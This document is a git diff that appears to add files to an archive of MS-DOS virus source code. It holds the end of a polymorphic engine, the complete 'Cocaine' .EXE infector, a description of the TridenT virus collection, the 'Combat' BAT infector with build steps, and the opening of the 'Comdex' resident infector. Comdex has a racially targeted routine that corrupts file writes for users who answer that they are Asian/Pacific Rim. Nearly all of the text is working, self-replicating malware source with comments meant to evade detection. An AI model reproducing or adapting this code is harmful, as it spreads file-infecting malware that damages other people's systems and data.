+ push bx
+ call rnd_get
+ xchg ax,bx
+ and bx,0F7FBh ;insert XOR [SI],xxxx
+ or bl,8
+ call do_xor
+ pop bx
+junk6_ret: pop cx
+ ret
+
+
+junk7: and al,0F ;MOV reg,xxxx
+ or al,0B0
+ call no_sp
+ stosb
+ test al,8
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junk8: and ah,39 ;DO r/m,r(8/16)
+ or al,0C0
+ call no_sp
+ xchg al,ah
+ stosw
+ ret
+
+
+junk9: and al,3Bh ;DO r(8/16),r/m
+ or al,2
+ and ah,3F
+ call no_sp2
+ call no_bp
+ stosw
+ ret
+
+
+junkA: and ah,1 ;DO rm,xxxx
+ or ax,80C0
+ call no_sp
+ xchg al,ah
+ stosw
+ test al,1
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junkB: call nop8 ;NOP / LOOP
+ mov ax,0FDE2
+ stosw
+ ret
+
+
+junkC: and al,09 ;CMPS* or SCAS*
+ test ah,1
+ jz mov_test
+ or al,0A6
+ stosb
+ ret
+mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
+ stosb
+ cmp al,0A8
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junkD: and al,07 ;XCHG AX,reg
+ or al,90
+ call no_sp
+ stosb
+ ret
+
+
+junkE: and ah,07 ;PUSH reg / POP reg
+ or ah,50
+ mov al,ah
+ or ah,08
+ stosw
+ ret
+
+
+junkF: and al,0F ;INC / DEC
+ or al,40
+ call no_sp
+ stosb
+ ret
+
+
+;****************************************************************************
+;* store a byte or a word
+;****************************************************************************
+
+byte_word: jz only_byte
+ stosw
+ ret
+
+only_byte: stosb
+ ret
+
+
+;****************************************************************************
+;* don't fuck with SP!
+;****************************************************************************
+
+no_sp: push ax
+ and al,7
+ cmp al,4
+ pop ax
+ jnz no_sp_ret
+ and al,0FBh
+no_sp_ret: ret
+
+
+;****************************************************************************
+;* don't fuck with SP!
+;****************************************************************************
+
+no_sp2: push ax
+ and ah,38
+ cmp ah,20
+ pop ax
+ jnz no_sp2_ret
+ xor ah,20
+no_sp2_ret: ret
+
+
+;****************************************************************************
+;* don't use [BP+..]
+;****************************************************************************
+
+no_bp: test ah,4
+ jnz no_bp2
+ and ah,0FDh
+ ret
+
+no_bp2: push ax
+ and ah,7
+ cmp ah,6
+ pop ax
+ jnz no_bp_ret
+ or ah,1
+no_bp_ret: ret
+
+
+;****************************************************************************
+;* write byte for JMP/CALL and fill with random bullshit
+;****************************************************************************
+
+fill_bullshit: push cx
+ xchg ax,cx
+bull_lup: call rnd_get
+ stosb
+ loop bull_lup
+ pop cx
+ ret
+
+
+;****************************************************************************
+;* random number generator (stolen from 'Bomber')
+;****************************************************************************
+
+rnd_init: push cx
+ call rnd_init0 ;init
+ and ax,000F
+ inc ax
+ xchg ax,cx
+random_lup: call rnd_get ;call random routine a few
+ loop random_lup ; times to 'warm up'
+ pop cx
+ ret
+
+rnd_init0: push dx ;initialize generator
+ push cx
+ mov ah,2C
+ int 21
+ in al,40
+ mov ah,al
+ in al,40
+ xor ax,cx
+ xor dx,ax
+ jmp short move_rnd
+
+rnd_get: push dx ;calculate a random number
+ push cx
+ push bx
+ mov ax,0 ;will be: mov ax,xxxx
+ mov dx,0 ; and mov dx,xxxx
+ mov cx,7
+rnd_lup: shl ax,1
+ rcl dx,1
+ mov bl,al
+ xor bl,dh
+ jns rnd_l2
+ inc al
+rnd_l2: loop rnd_lup
+ pop bx
+
+move_rnd: mov word ptr ds:[rnd_get+4],ax
+ mov word ptr ds:[rnd_get+7],dx
+ mov al,dl
+ pop cx
+ pop dx
+ ret
+
+
+;****************************************************************************
+;* tables for engine
+;****************************************************************************
+
+ ; AX AL AH (BX) BL BH CX CL CH
+mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5
+
+ ; nop clc stc cmc cli cld incbp decbp
+nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
+
+ ; or and xchg mov
+nop_data16 db 8, 20, 84, 88
+
+ ; bl/bh, bx, si di
+dir_change db 07, 07, 04, 05
+ind_change db 03, 03, 06, 07
+
+
+ ; xor xor add sub
+how_mode db 30, 30, 00, 28
+
+ ; ? add xor or
+add_mode db 0, 0C8, 0F0, 0C0
+
+
+;****************************************************************************
+;* text + buffer
+;****************************************************************************
+
+ db ' Amsterdam = COFFEESHOP! '
+
+buffer db 0CDh, 20 ;original code of dummy program
+ db (BUFLEN-2) dup (?)
+
+
+;****************************************************************************
+;* the (packed) picture routine
+;****************************************************************************
+
+beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h
+ db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh
+ db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh
+ db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h
+ db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h
+ db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h
+ db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch
+ db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h
+ db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh
+ db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh
+ db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h
+ db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch
+ db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h
+ db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh
+ db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh
+ db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh
+ db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh
+ db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h
+ db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h
+ db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h
+ db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h
+ db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh
+ db 0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h
+ db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h
+ db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h
+ db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h
+ db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h
+ db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h
+ db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h
+ db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh
+ db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch
+ db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh
+ db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h
+ db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh
+ db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh
+ db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh
+ db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h
+ db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h
+ db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh
+ db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h
+ db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh
+ db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh
+ db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h
+ db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h
+ db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h
+ db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h
+ db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h
+ db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h
+ db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh
+ db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h
+ db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh
+ db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh
+ db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h
+ db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh
+ db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h
+ db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh
+ db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h
+ db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h
+ db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh
+ db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h
+ db 072h, 0C0h, 062h, 040h, 00Eh, 06Ch, 07Bh, 047h
+ db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h
+ db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh
+ db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h
+ db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh
+ db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h
+ db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h
+ db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h
+ db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h
+ db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh
+ db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh
+ db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh
+ db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h
+ db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h
+ db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h
+ db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h
+ db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h
+ db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h
+ db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh
+ db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh
+ db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h
+ db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h
+ db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah
+ db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h
+ db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh
+ db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h
+ db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh
+ db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah
+ db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h
+ db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh
+ db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h
+ db 0E9h, 07Dh, 0EBh
+
+last:
+
+_TEXT ends
+ end first
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.coke.asm b/MSDOS/Virus.MSDOS.Unknown.coke.asm
new file mode 100644
index 00000000..c7442a6e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.coke.asm
@@ -0,0 +1,280 @@
+; Virus name : Cocaine [CoKe]
+; Virus author: Metal Militia
+; Virus group : Immortal Riot
+; Origin : Sweden
+;
+; This is an non-resident, .EXE infector moving upwards using the
+; "dot-dot" method. Watch your .EXE files for the bad guy siganture
+; "IR" somewhere in the beginning, after the MZ or ZM thang.. :)
+;
+; Also, check your back for a "?" a bit from it aswell. Btw! Everytime
+; you run it, it'll take out that fucking MSAV piece of shit from your
+; memory. Im telling you, go get TB-SCAN or something instead of such
+; hacked things. TB-Scan finds this virus as both Ear-6 and Burma but
+; is not any sort of hack from them or something. I didn't had time to
+; fix the encryption, and since this is just a test from me i really
+; don't give a shit, but ofcause you're always welcome to keep
+; developing it, heheh :)
+;
+; To add here, is that Ear-6 is non-res com/exe infector, umm.. that's
+; Dark Angels virus, and this is not alike it! Burma is non-res ow-vir,
+; and also not very much alike this anyhow.. However, i've heard about
+; some resident, non-ow Burma aswell? Not sure on thatone. So, it'll
+; probably only confuse some users, I guess.. Enjoy Insane Reality #4!!
+;
+;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+; COCAINE! [CoKE]
+;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+.model tiny
+.radix 16
+.code
+ org 100
+start:
+ mov blast,0fa01 ; Take MSAV's shit
+ mov dx,5945h ; out of the fucking
+ int 16 ; memory right away
+
+ push ds ;Save old offset
+
+ push cs ;Set ES/DS/CS
+ pop es
+ push cs
+ pop ds ;for data accessing.
+
+ call get_offset ;This places the displace-
+ get_offset: ;ment of the virus from
+ pop bp ;its original compilation
+ sub bp,offset get_offset ;into BP.
+
+ Reset_Variables: ;Reset XX_old values for
+ lea di,[IP_storage+bp] ;new infection.
+ lea si,[IP_old+bp]
+ call mov_it
+ call mov_it
+ call mov_it
+ call mov_it
+ jmp set_dta
+mov_it:
+ movsw ; movsw
+ ret ; ret(urn) to caller
+
+ Set_DTA:
+ lea dx,[New_DTA+bp] ;Set DTA to the after
+ mov ah,readin ;virus
+ int 21
+
+ mov ah,47h ; Get
+ mov dl,0 ; current
+ lea si,[bp+new_dta+2ch] ; directory
+ int 21h
+
+ Find_first_file:
+ mov ah,4e ; Find first
+ lea dx,[bp+masker] ; .EXE file
+
+ Find_File:
+ int 21
+ jnc infeqt ; If found, infect
+ jmp ch_dir ; Else, change directoy
+
+ Infeqt:
+ mov blast,3d02 ; Open file
+ lea dx,[bp+New_DTA+1e] ; 1eh = DTA place for filename
+ int 21
+
+ xchg bx,blast ; Or, mov ax,bx
+
+ mov ah,3f ; Read in
+ mov mate,readin ; 1ah
+ lea dx,[bp+exe_header] ; to EXE header
+ int 21
+
+ cmp word ptr [bp+exe_header+0e],'RI' ; Check if already
+ je close_file ; infected. If so,
+ ; close and get nextone
+ call Save_Old_Header ; Save old header
+
+ mov blast,4202 ; Go to the end of the file.
+ xor mate,mate
+ cwd
+ int 21
+
+ push blast
+ push dx
+
+ call calculate_CSIP ; calculate virus startingpoint
+
+ pop dx
+ pop blast
+
+ call calculate_size ; calculate fsize for the header
+
+ mov mate,end_virus-start ; viruscode
+ mov ah,svenne ; write it
+ lea dx,[bp+start] ; from start
+ int 21 ; to victim (uninfected file)
+
+ mov blast,4200 ; Return to the beginning
+ xor mate,mate ; of the file.
+ cwd
+ int 21
+
+ mov mate,readin ; 1ah
+ mov ah,svenne ; write it
+ lea dx,[bp+exe_header] ; to the EXE header
+ int 21
+
+Close_File:
+ mov ah,3e ; close the file
+ int 21 ; and go get the nextone
+
+ Find_Next_File:
+ mov ah,4f ; find next file
+ jmp Find_File ; do it!
+
+ No_More_Files:
+ mov ah,2a ; get date
+ int 21
+ cmp dl,1 ; 1st of any month?
+ jne ret_to_host ; if not, outa here
+
+ mov ah,9 ; print
+ lea dx,[bp+eternal_love] ; the note
+ int 21
+ jmp $
+
+ret_to_host:
+
+ lea dx,[bp+new_dta+2ch] ; Restore
+ mov ah,3bh ; directory
+ int 21
+
+ pop ds
+ mov dx,80 ; restore
+ mov ah,readin ; the DTA
+ int 21
+
+ Restore_To_Host:
+ push ds ; Restore ES/DS/PSP
+ pop es
+
+ mov blast,es
+ add blast,10
+
+ add word ptr cs:[bp+CS_storage],blast
+ ; By current seg, adjust old CS
+
+ cli ; Clear int's
+ add blast,word ptr cs:[bp+SS_storage] ; Old SS (adjust it)
+ mov ss,blast ; Original position
+ mov sp,word ptr cs:[bp+SP_storage] ; (return stack)
+ sti ; Store (?) int's
+
+ db 0ea ; Jmp Far
+ IP_storage dw 0 ; Storage place for IP/CS/SP/SS
+ CS_storage dw 0
+ SP_storage dw 0
+ SS_storage dw 0
+
+
+ IP_old dw 0
+ CS_old dw 0fff0
+ SP_old dw 0
+ SS_old dw 0fff0
+
+ K_kool:
+ jmp no_more_files
+ K_spam:
+ jmp find_first_file
+ Save_Old_Header:
+ mov blast,word ptr [exe_header+bp+0e] ; Save SS (old)
+ mov word ptr [SS_old+bp],blast
+ mov blast,word ptr [exe_header+bp+10] ; Save SP (old)
+ mov word ptr [SP_old+bp],blast
+ mov blast,word ptr [exe_header+bp+14] ; Save IP (old)
+ mov word ptr [IP_old+bp],blast
+ mov blast,word ptr [exe_header+bp+16] ; Save CS (old)
+ mov word ptr [CS_old+bp],blast
+ ret
+
+ calculate_CSIP:
+ push blast
+ mov blast,word ptr [exe_header+bp+8] ;Get header length
+ mov cl,brutal ;and convert it to
+ shl blast,cl ;bytes.
+ mov mate,blast
+ pop blast
+
+ sub blast,mate ;Subtract from
+ sbb dx,RAVE ;file (header size)
+
+ mov cl,0c ;Convert into segment
+ shl dx,cl ;address (DX)
+ mov cl,brutal
+ push blast
+ shr blast,cl
+ add dx,blast
+ shl blast,cl
+ pop mate
+ sub mate,blast
+ mov word ptr [exe_header+bp+14],mate
+ mov word ptr [exe_header+bp+16],dx ;Set CS:IP (new)
+ mov word ptr [exe_header+bp+0e],'RI' ;Set SS/CS (new)
+ mov word ptr [exe_header+bp+10],0fffe ;Set SP (new)
+ mov byte ptr [exe_header+bp+12],'?' ;mark infection
+ ret
+
+ calculate_size:
+ push blast ;Save offset for later
+
+ add blast,end_virus-start ; add size (virus)
+ adc dx,RAVE
+
+ mov cl,POLICE
+ shl dx,cl ;convert to pages (DX)
+ mov cl,BRUTALITY
+ shr blast,cl
+ add blast,dx
+ inc blast
+ mov word ptr [exe_header+bp+SPAM],blast ; save pages (x number)
+
+ pop blast ; get offset
+ mov dx,blast
+ shr blast,cl ; calcute last page
+ shl blast,cl ; (remainder)
+ sub dx,blast
+ mov word ptr [exe_header+bp+RUDE],dx ;save remainder
+ ret
+
+ ch_dir:
+ mov ah,3bh ; Change
+ lea dx,[bp+dot_dot] ; up a dir
+ int 21
+ jc no_more ; If root, outa here
+ jmp k_spam ; Else, try to infect here aswell
+
+ no_more:
+ jmp k_kool
+
+ blast equ ax
+ mate equ cx
+ police equ 7
+ brutality equ 9
+ rave equ 0 ; Hey! That's you :)
+ spam equ 04
+ rude equ 02
+ brutal equ 4
+ readin equ 1a
+ svenne equ 40
+ virnote db 'Cocaine [CoKe]'
+ db '(c) Metal Militia/Immortal Riot'
+ eternal_love db 0dh,0ah,'Love to LISA :)',0dh,0ah,'$'
+ db 'Cocaine''s running thrue your vains'
+ db 'It seems you have become an addict'
+ masker db '*IR.EXE',0 ;File mask used for search
+ dot_dot db '..',0
+ end_virus:
+ exe_header db 1a dup (?)
+ New_DTA:
+ end start
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.collectn.txt b/MSDOS/Virus.MSDOS.Unknown.collectn.txt
new file mode 100644
index 00000000..8e811517
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.collectn.txt
@@ -0,0 +1,26 @@
+ - TridenT -
+
+This is a collection of 100+ viruses, many of them with the original source
+code. These viruses were created by the members of the Dutch virus writing
+group TridenT. The collection is divided into seperate archives to cover the
+individual members of the group:
+
+ - Bit Addict
+ - Crom-Cruach
+ - Dark Helmet
+ - Darkray
+ - Masud Khafir
+ - Glen Benton later known as John Tardy
+
+Also included are the 4 versions of the TridenT Polymorphic Engine,
+one of the first polymorphic engines used to create "undetectable" viruses,
+and interviews with several of the members. Spread throughout the archives
+are copies of viruses of TridenT "copy-cats" and "wannabees".
+
+Following "updates" to this collection will be minor since the "well" is
+about dry. I must have waded thru 100+ Mb of files to get this far, there is
+no more to find.
+
+Enjoy
+
+<-洝洜T狻X-|05/95>
diff --git a/MSDOS/Virus.MSDOS.Unknown.combat.asm b/MSDOS/Virus.MSDOS.Unknown.combat.asm
new file mode 100644
index 00000000..6e191b85
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.combat.asm
@@ -0,0 +1,142 @@ +;=====( Combat virus by Rajaat )=============================================== +; +; Non-resident BAT infector, doesn't use external programs by third party. +; +;============================================================================== +; +; Virus name : Combat +; Author : Rajaat +; Origin : United Kingdom, July 1996 +; Compiling : Using TASM +; +; TASM /M COMBAT +; TLINK /T COMBAT +; REN COMBAT.COM COMBAT.BAT +; Targets : BAT files +; Size : Doesn't matter +; Resident : No +; Polymorphic : No +; Encrypted : No +; Stealth : No +; Tunneling : No +; Retrovirus : No +; Antiheuristics: No +; Peculiarities : It infects BAT files parasitically +; Drawbacks : It's a goddamn BAT infector, what do you think?!? +; Behaviour : No really, find out yourself! I was bored and made this, +; do you really think I'd spend time explaining what it DOES? +; It's unknown what this virus might do besides replicate :) +;============================================================================== +; +; Results with antivirus software +; +; TBFILE - Not tested +; TBSCAN - Not tested +; TBMEM - Not tested +; TBCLEAN - Not tested +; SVS - Not tested +; SSC - Not tested +; F-PROT - Not tested +; F-PROT /ANALYSE - Not tested +; F-PROT /ANALYSE /PARANOID - Not tested +; AVP - Not tested +; VSAFE - Not tested +; NEMESIS - Not tested +; +;============================================================================== + +.model tiny +.code +.radix 16 + +signature equ 5240 + + org 100 + +main: + db '@REM ',0ff + jmp com_entry + db ' * ComBat *' + db 0dh,0ah + db '@echo off',0dh,0ah + db 'goto ComBat',0dh,0ah + +com_entry: mov si,80 + cmp byte ptr ds:[si],0 + je no_check + cld +find_argument: inc si + lodsb + dec si + cmp al,20 + je find_argument + mov dx,si +find_end: lodsb + cmp al,0dh + jne find_end + mov byte ptr ds:[si-1],0 + push dx + mov ax,3d02 + int 21 + jc no_check + xchg ax,bx + lea dx,virus_end + mov ah,3f + mov cx,3 + int 21 + mov ah,3e + int 21 + pop dx + cmp 
word ptr virus_end,signature + je no_check + mov ax,4301 + xor cx,cx + int 21 + mov ah,3c + xor cx,cx + lea dx,temp_file + int 21 + jc no_check + xchg ax,bx + mov ah,40 + lea dx,main + mov cx,file_length + int 21 + mov ah,3e + int 21 + mov ax,4c00 + int 21 + + db 0,'Rajaat / Genesis',0 + +no_check: mov ax,4c01 + int 21 + +temp_file db 'ComBat.TMP',0 + +batch_2 db 0dh,0ah + db ':ComBat',0dh,0ah + db 'if #%_tmp%#==## goto no_call',0dh,0ah + db 'C:\ComBat.COM %1',0dh,0ah + db 'if errorlevel 1 goto done_ComBat',0dh,0ah + db 'type %1 >> ComBat.TMP',0dh,0ah + db 'echo. >> ComBat.TMP',0dh,0ah + db 'echo :done_ComBat >> ComBat.TMP',0dh,0ah + db 'copy ComBat.TMP %1 > nul',0dh,0ah + db 'del ComBat.TMP > nul',0dh,0ah + db 'goto done_ComBat',0dh,0ah + db ':no_call',0dh,0ah + db 'set _tmp=%0',0dh,0ah + db 'if #%_tmp%#==## set _tmp=AUTOEXEC.BAT',0dh,0ah + db 'if not exist %_tmp% set _tmp=%0.BAT',0dh,0ah + db 'if not exist %_tmp% goto path_error',0dh,0ah + db 'copy %_tmp% C:\ComBat.COM > nul',0dh,0ah + db 'for %%f in (*.bat c:\*.bat c:\dos\*.bat c:\windows\*.bat ..\*.bat) do call %_tmp% %%f',0dh,0ah + db 'del C:\ComBat.COM > nul',0dh,0ah + db ':path_error',0dh,0ah + db 'set _tmp=',0dh,0ah +file_length equ $-main +virus_end equ $ + db ':done_ComBat',0dh,0ah + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.comdex7.asm b/MSDOS/Virus.MSDOS.Unknown.comdex7.asm new file mode 100644 index 00000000..bad65b0d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comdex7.asm 
@@ -0,0 +1,805 @@ +; The Comdex exibit guide program +; For the Fall 1991 Comdex Las Vegas Convention +; +; +; A short description of the program: +; +; It only affects .exe files. +; Comdex attaches itself to the end of the programs it affects. +; +; When an affected file is run, Comdex copies itself to top of +; free memory, and modifies the memory blocks, in order to hide from +; memory mapping programs. Some programs may overwrite this area, +; causing the computer to crash. If this happens, the user obviously +; deserved it. +; +; Comdex will hook int 21h and when function 4b (exec) is called +; it sometimes will affect the program being run. It will check every +; program that is run for affection, and if it is not already +; affected, it will be. +; +; Comdex will, after 1 hr, one of 16 chance, ask your race or +; nationality prior to executing a file. Af you answer that you +; are asian/pacific rim, one of 256 file writes will have the +; length adjusted downward or the record size reduced, depending +; upon the specific dos call made. +; +; +; Comdex will remove the read-only attribute before trying to +; affect programs. +; +; Affected files can be easily recognized, since they always end in +; "COMD" +; +; To check for system affection, a byte at 0:33c is used - if it +; contains a 069h, Comdex is installed in memory. +; +; +comsiz equ 128 ;in paragraphs + +code segment para public 'code' + assume cs:code,ds:nothing,ss:nothing,es:nothing + +; +; Comdex is basically divided in the following parts. +; +; 1. the main program - run when an affected program is run. +; it will check if the system is already affected, and if not +; it will install Comdex. +; +; 2. the new int 17 handler. adjusts two ascii output chars. +; +; 3. the new int 14 handler. +; +; 4. the new int 8 handler. +; +; 5. the new int 9 handler. +; +; 6. the new int 21 handler. it will look for exec calls, and +; affect the program being run. 
+; +; +; this is a fake mcb (memory control block) +; ms-dos inspects the chain of mcbs whenever a memory block allocation, +; modification, or release function is requested, or when a program +; is execed or terminated... +; + db 'Z',00,00,comsiz,0,0,0,0,0,0,0,0,0,0,0,0 +; ^___ # of paragraphs of the controlled mem blk + + + +Comdex proc far +; +; Comdex starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +labl: sub sp,4 + push bp + mov bp,sp + push ax +;following line nuked for ease of test +; nop ;added so that scan84 doesn't id as [ice-3] + mov ax,es +; +; put the the original cs on the stack. the add ax,data instruction +; is modified by Comdex when it affects other programs. +; + db 05h ;this is an add ax,10h +org_cs dw 0010h + mov [bp+4],ax +; +; put the the original ip on the stack. this mov [bp+2],data instruction +; is modified by Comdex when it affects other programs. +; + db 0c7h,46h,02h +org_ip dw 0000h +; +; save all registers that are modified. +; + push es + push ds + push bx + push cx + push si + push di +; +; check if already installed. quit if so. +; + mov ax,0 + mov es,ax ;zero es + cmp es:[33ch],byte ptr 069h +;&& +; jne l1 +; +; restore all registers and return to the original program. +; +exit: pop di + pop si + pop cx + pop bx + pop ds + pop es + pop ax + pop bp + retf +; +; Comdex tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; it looks rather weird, but it seems to work. +; +l1: mov ah,52h + call int21 ;undefined dos call!!? + mov ax,es:[bx-2] + nop + mov es,ax + add ax,es:[0003] + inc ax + inc ax + mov cs:[0001],ax +; +; next, Comdex modifies the memory block of the affected program. +; it is made smaller, and no longer the last block. 
+; + mov bx,ds + dec bx + nop + mov ds,bx + mov al,'M' + mov ds:[0000],al + mov ax,ds:[0003] + sub ax,comsiz + mov ds:[0003],ax + add bx,ax + inc bx +; +; then Comdex moves itself to the new block. +; + mov es,bx + xor si,si + xor di,di + push cs + pop ds + mov cx,652h ;the length of this program - + ;be *sure* to update this!! + ;in fact, make it symbolic!! + cld + rep movsb +; +; Comdex then transfers control to the new copy of itself. +; + push es + nop + mov ax,offset l3 + push ax + retf + db 3dh ;confuse disassemblers +; +; zero some variables +; +l3: mov byte ptr cs:[min60],0 + mov byte ptr cs:[min50],0 + mov word ptr cs:[timer],0 + mov byte ptr cs:[input_char],0 +; +; set flag to confirm installation +; + xor ax,ax + mov es,ax + inc ax ;dummy operation to confuse function + mov byte ptr es:[33ch],069h +; +; hook interrupt 21: +; (the primary dos function interrupt) +; + mov ax,es:[0084h] + mov cs:[old21],ax + mov ax,es:[0086h] + nop + mov cs:[old21+2],ax + mov ax,cs + mov es:[0086h],ax + mov ax,offset new21 + mov es:[0084h],ax +; +; hook interrupt 17: +; (bios lpt services) +; + mov ax,es:[005ch] + mov cs:[old17],ax + nop + mov ax,es:[005eh] + mov cs:[old17+2],ax + inc ax 